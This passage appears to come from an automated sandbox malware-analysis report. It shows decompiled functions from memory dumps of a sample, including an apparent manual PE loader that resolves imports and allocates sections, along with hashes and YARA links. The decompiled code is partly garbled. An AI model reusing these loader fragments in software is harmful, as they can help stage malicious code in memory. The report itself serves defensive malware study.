                                                                                                                                                    • Associated: 00000004.00000002.646312035.0000000010333000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646339843.0000000010338000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646354560.0000000010339000.00000004.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Heap$CreateDestroy
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3296620671-0
                                                                                                                                                    • Opcode ID: 5a1a973faed6d8a822eaf08af6955b7a6d3ceb593ce69a0c795b7abb1ad563cd
                                                                                                                                                    • Instruction ID: 18b3e498289fdb7ab6605063347cbbacb6f5d5722921e9c790f7d219c67cf86e
                                                                                                                                                    • Opcode Fuzzy Hash: 5a1a973faed6d8a822eaf08af6955b7a6d3ceb593ce69a0c795b7abb1ad563cd
                                                                                                                                                    • Instruction Fuzzy Hash: E3E06D78614352AAF700EB319C897A536ECF7847D6F20883DF408C98AAFF609511AA01
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004056D6, Relevance: 1.6, APIs: 1, Instructions: 113libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                    			E004056D6(intOrPtr* _a4) {
				intOrPtr* _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				intOrPtr* _v24;
				signed int* _v28;
				struct HINSTANCE__* _v32;
				intOrPtr _v36;
				struct HINSTANCE__* _t67;
				intOrPtr* _t72;

				_v12 = 1;
				_v16 =  *((intOrPtr*)(_a4 + 4));
				_v8 =  *_a4 + 0x80;
				if( *((intOrPtr*)(_v8 + 4)) <= 0) {
					L22:
					return _v12;
				} else {
					_v20 = _v16 +  *_v8;
					while( *((intOrPtr*)(_v20 + 0xc)) != 0) {
						_t67 = LoadLibraryExA(_v16 +  *((intOrPtr*)(_v20 + 0xc)), 0, 0); // executed
						_v32 = _t67;
						if(_v32 != 0) {
							if( *_v20 == 0) {
								_v28 = _v16 +  *((intOrPtr*)(_v20 + 0x10));
								_v24 = _v16 +  *((intOrPtr*)(_v20 + 0x10));
							} else {
								_v28 = _v16 +  *_v20;
								_v24 = _v16 +  *((intOrPtr*)(_v20 + 0x10));
							}
							while( *_v28 != 0) {
								if(( *_v28 & 0x80000000) == 0) {
									_t72 = _v28;
									_v36 = _v16 +  *_t72;
									asm("loopne 0xffffff85");
									return _t72;
								} else {
									 *_v24 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10))))(_v32,  *_v28 & 0x0000ffff);
									if( *_v24 != 0) {
										_v28 =  &(_v28[1]);
										_v24 = _v24 + 4;
										continue;
									} else {
										_v12 = 0;
										break;
									}
								}
								goto L23;
							}
							if(_v12 != 0) {
								_v20 = _v20 + 0x14;
								continue;
							} else {
								goto L22;
							}
						} else {
							_v12 = 0;
							goto L22;
						}
						goto L23;
					}
					goto L22;
				}
				L23:
			}













                                                                                                                                                    0x004056dc
                                                                                                                                                    0x004056e9
                                                                                                                                                    0x004056f6
                                                                                                                                                    0x00405700
                                                                                                                                                    0x00405818
                                                                                                                                                    0x0040581e
                                                                                                                                                    0x00405706
                                                                                                                                                    0x0040570e
                                                                                                                                                    0x0040571c
                                                                                                                                                    0x0040573d
                                                                                                                                                    0x0040573f
                                                                                                                                                    0x00405746
                                                                                                                                                    0x0040575a
                                                                                                                                                    0x0040577e
                                                                                                                                                    0x0040578a
                                                                                                                                                    0x0040575c
                                                                                                                                                    0x00405764
                                                                                                                                                    0x00405770
                                                                                                                                                    0x00405770
                                                                                                                                                    0x004057a1
                                                                                                                                                    0x004057b4
                                                                                                                                                    0x004057d5
                                                                                                                                                    0x004057dd
                                                                                                                                                    0x004057e2
                                                                                                                                                    0x004057e4
                                                                                                                                                    0x004057b6
                                                                                                                                                    0x004057d1
                                                                                                                                                    0x004057fe
                                                                                                                                                    0x00405795
                                                                                                                                                    0x0040579e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405800
                                                                                                                                                    0x00405800
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405800
                                                                                                                                                    0x004057fe
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004057b4
                                                                                                                                                    0x0040580f
                                                                                                                                                    0x00405719
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405811
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405811
                                                                                                                                                    0x00405748
                                                                                                                                                    0x00405748
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405748
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405746
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040571c
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryExA.KERNELBASE(00000000,00000000,00000000), ref: 0040573D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000004.00000002.627045125.0000000000404000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000004.00000002.627003150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.627030438.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.627057789.0000000000406000.00000080.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.627075353.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.627086120.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.627109881.0000000000498000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                                    • Opcode ID: 4a3c49af93ba79db0bc14ebb5469e7102d4c44c77b7e0d30c7dd675cd8bf6e47
                                                                                                                                                    • Instruction ID: 9758fe53a4cebbf94759484ecd4dac8016ca4c30560db2a889f3107340ceafa4
                                                                                                                                                    • Opcode Fuzzy Hash: 4a3c49af93ba79db0bc14ebb5469e7102d4c44c77b7e0d30c7dd675cd8bf6e47
                                                                                                                                                    • Instruction Fuzzy Hash: 55518274E0060ADFDB04DF88C891BAEB7B1FF88304F248569D815AB391C734A991DF99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1001A348, Relevance: 1.5, APIs: 1, Instructions: 8registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E1001A348() {
				intOrPtr _t4;
				void* _t6;

				RegCloseKey( *(_t6 - 4)); // executed
				_t4 =  *((intOrPtr*)(_t6 - 8));
				return _t4;
			}





                                                                                                                                                    0x1001a355
                                                                                                                                                    0x1001a35b
                                                                                                                                                    0x1001a361

                                                                                                                                                    APIs
                                                                                                                                                    • RegCloseKey.KERNELBASE(00000000), ref: 1001A355
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000004.00000002.645019852.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                    • Associated: 00000004.00000002.645009330.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.645045809.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646312035.0000000010333000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646339843.0000000010338000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646354560.0000000010339000.00000004.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Close
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3535843008-0
                                                                                                                                                    • Opcode ID: d2df109e2e3a954468d9a82ee657232a079eb237185f4a8d45fe512a1c1b322a
                                                                                                                                                    • Instruction ID: 4111118035c4145df5d6207d544e668d3b67a138326457bd21328434b6feecb4
                                                                                                                                                    • Opcode Fuzzy Hash: d2df109e2e3a954468d9a82ee657232a079eb237185f4a8d45fe512a1c1b322a
                                                                                                                                                    • Instruction Fuzzy Hash: 0BB09239A00208ABCB28DB94D99896CBBB4EB49211B2002C8FD1957300CA32DE909B50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 100196B0, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E100196B0() {
				intOrPtr _t2;

				EnumWindows(E100193D0, 0);
				_t2 =  *0x10334dcc; // 0x0
				return _t2;
			}




                                                                                                                                                    0x100196ba
                                                                                                                                                    0x100196c0
                                                                                                                                                    0x100196c6

                                                                                                                                                    APIs
                                                                                                                                                    • EnumWindows.USER32(100193D0,00000000), ref: 100196BA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000004.00000002.645019852.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                    • Associated: 00000004.00000002.645009330.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.645045809.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646312035.0000000010333000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646339843.0000000010338000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646354560.0000000010339000.00000004.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EnumWindows
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1129996299-0
                                                                                                                                                    • Opcode ID: 7b91731e1b266c86d6d5741dbb4d36dd08444226e1612734dfd1edc9386e6602
                                                                                                                                                    • Instruction ID: 7683e32c74e984589ed8171971aef47be7b2dd233b4377330bb03058a9762bfb
                                                                                                                                                    • Opcode Fuzzy Hash: 7b91731e1b266c86d6d5741dbb4d36dd08444226e1612734dfd1edc9386e6602
                                                                                                                                                    • Instruction Fuzzy Hash: 2BB09234240219A7D20097C59C8AB40B7ACE344E54F508001F6085A6928AA1B8108555
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1000EBD1, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                    			E1000EBD1(void* __ebx, void* __edi, void* __esi, void* __ebp, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t5;
				void* _t13;

				E10015254();
				_push(_a4);
				_t5 = L1000EAD4(__ebx, _a12, _a8, __edi, __esi, _t13); // executed
				return _t5;
			}





                                                                                                                                                    0x1000ebd1
                                                                                                                                                    0x1000ebd6
                                                                                                                                                    0x1000ebe2
                                                                                                                                                    0x1000ebe8

                                                                                                                                                    APIs
                                                                                                                                                    • ___security_init_cookie.LIBCMT ref: 1000EBD1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000004.00000002.645019852.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                    • Associated: 00000004.00000002.645009330.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.645045809.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646312035.0000000010333000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646339843.0000000010338000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646354560.0000000010339000.00000004.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ___security_init_cookie
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3657697845-0
                                                                                                                                                    • Opcode ID: 435c711d617b55a71fb4d1b54f090de3e7e2be7afa2c94b8a1ac53afd156608b
                                                                                                                                                    • Instruction ID: df3c7268351b8d96a0cbb6988288c15aabcc851e0dc57428b4f822f300cb22e6
                                                                                                                                                    • Opcode Fuzzy Hash: 435c711d617b55a71fb4d1b54f090de3e7e2be7afa2c94b8a1ac53afd156608b
                                                                                                                                                    • Instruction Fuzzy Hash: 9DB0483A208280AB9204CA10D84180EB3A2EBD9211F24C91DF4A61AA558B31AC64EA52
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00405386, Relevance: 1.3, APIs: 1, Instructions: 88memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                    			E00405386(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _t55;
				void* _t58;
				void* _t100;

				_t2 = _a12 + 4; // 0x558be04d
				_v20 =  *_t2;
				_t6 =  *_a12 + 0x14; // 0xe84d8b50
				_t8 = ( *_t6 & 0x0000ffff) + 0x18; // 0x4050e5
				_v24 =  *_a12 + _t8;
				_v8 = 0;
				while(1) {
					_t55 =  *_a12;
					_t16 = _t55 + 6; // 0x2bf4558b
					if(_v8 >= ( *_t16 & 0x0000ffff)) {
						break;
					}
					if( *(_v24 + 0x10) != 0) {
						_t58 = VirtualAlloc(_v20 +  *((intOrPtr*)(_v24 + 0xc)),  *(_v24 + 0x10), 0x1000, 4); // executed
						_v12 = _t58;
						E00405196(_v12, _a4 +  *((intOrPtr*)(_v24 + 0x14)),  *(_v24 + 0x10));
						_t100 = _t100 + 0xc;
						 *((intOrPtr*)(_v24 + 8)) = _v12;
					} else {
						_v16 =  *((intOrPtr*)(_a8 + 0x38));
						if(_v16 > 0) {
							_t29 = _a12 + 0x14; // 0xe84d8b50
							_v12 =  *((intOrPtr*)( *_t29))(_v20 +  *((intOrPtr*)(_v24 + 0xc)), _v16, 0x1000, 4);
							 *((intOrPtr*)(_v24 + 8)) = _v12;
							E00405156(_v12, _v12, 0, _v16);
							_t100 = _t100 + 0xc;
						}
					}
					_v8 = _v8 + 1;
					_v24 = _v24 + 0x28;
				}
				return _t55;
			}











                                                                                                                                                    0x0040538f
                                                                                                                                                    0x00405392
                                                                                                                                                    0x0040539f
                                                                                                                                                    0x004053a3
                                                                                                                                                    0x004053a7
                                                                                                                                                    0x004053aa
                                                                                                                                                    0x004053c5
                                                                                                                                                    0x004053c8
                                                                                                                                                    0x004053ca
                                                                                                                                                    0x004053d1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004053de
                                                                                                                                                    0x0040544a
                                                                                                                                                    0x0040544c
                                                                                                                                                    0x00405464
                                                                                                                                                    0x00405469
                                                                                                                                                    0x00405472
                                                                                                                                                    0x004053e0
                                                                                                                                                    0x004053e6
                                                                                                                                                    0x004053ed
                                                                                                                                                    0x00405407
                                                                                                                                                    0x0040540c
                                                                                                                                                    0x00405415
                                                                                                                                                    0x00405422
                                                                                                                                                    0x00405427
                                                                                                                                                    0x00405427
                                                                                                                                                    0x0040542a
                                                                                                                                                    0x004053b9
                                                                                                                                                    0x004053c2
                                                                                                                                                    0x004053c2
                                                                                                                                                    0x0040547d

                                                                                                                                                    APIs
                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000065,00000000,00001000,00000004,?,004050CD,?,?), ref: 0040544A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000004.00000002.627045125.0000000000404000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000004.00000002.627003150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.627030438.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.627057789.0000000000406000.00000080.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.627075353.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.627086120.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.627109881.0000000000498000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                    • Opcode ID: 995886c88333ff6c5b9bdc1fa7ca92dea5fdaf9cddbee301942063e012c8cb90
                                                                                                                                                    • Instruction ID: 11e699d2d28cb8044b408126c66a0a99df5691f76e7a5c3103e1857bbc5c89dd
                                                                                                                                                    • Opcode Fuzzy Hash: 995886c88333ff6c5b9bdc1fa7ca92dea5fdaf9cddbee301942063e012c8cb90
                                                                                                                                                    • Instruction Fuzzy Hash: 4641BAB4A00209DFCB08CF84D990AAEB7B1FF48305F208559E915AB395D774EE91CFA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Non-executed Functions